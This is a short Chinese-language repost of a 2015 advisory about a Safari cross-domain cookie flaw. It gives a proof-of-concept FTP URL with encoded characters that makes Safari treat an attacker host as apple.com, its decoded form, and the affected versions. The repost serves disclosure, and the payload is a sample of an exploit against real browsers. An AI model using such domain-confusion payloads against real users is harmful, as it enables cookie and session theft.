Safari iOS/OS X/Windows cookie vulnerability

admin

from：http://klikki.fi/adv/safari.html
2015.4.8 苹果升级了很多漏洞，包括Safari的一个跨域漏洞

poc：

1. 
   
2. ftp://user%40ftp.attacker.tld%2Fexploit.html%23@apple.com/
   

复制代码

实际上是

1. 
   
2. ftp://user@ftp.attacker.tld/exploit.html#apple.com/
   

复制代码

上面的url实际域名是ftp.attacker.tld，但是Safari会认为是apple，这样就可以通过javascript操控apple.com域的内容了。
影响版本：

1. 
   
2. Safari 7.0.4 on OS X 10.9.3
   
3.     Safari on iPhone 3GS, iOS 6.1.6
   
4.     Safari on iOS 8.1 simulator
   
5.     Safari 5.1.7 on Windows 8.1
   

复制代码

详情：https://support.apple.com/en-us/HT201222

还好我用chrome